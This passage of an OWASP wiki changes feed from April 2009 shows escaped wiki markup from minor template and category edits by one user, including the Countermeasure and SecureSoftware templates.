[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:Countermeasure&amp;diff=59411</id>
		<title>Template:Countermeasure</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:Countermeasure&amp;diff=59411"/>
				<updated>2009-04-24T12:05:37Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__&lt;br /&gt;
This is a countermeasure. To view all countermeasures, please see the [[:Category:Countermeasure|Countermeasure Category]] page.&lt;br /&gt;
&lt;br /&gt;
[[Category:Countermeasure]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:SecureSoftware&amp;diff=59410</id>
		<title>Template:SecureSoftware</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:SecureSoftware&amp;diff=59410"/>
				<updated>2009-04-24T12:02:38Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	</feed>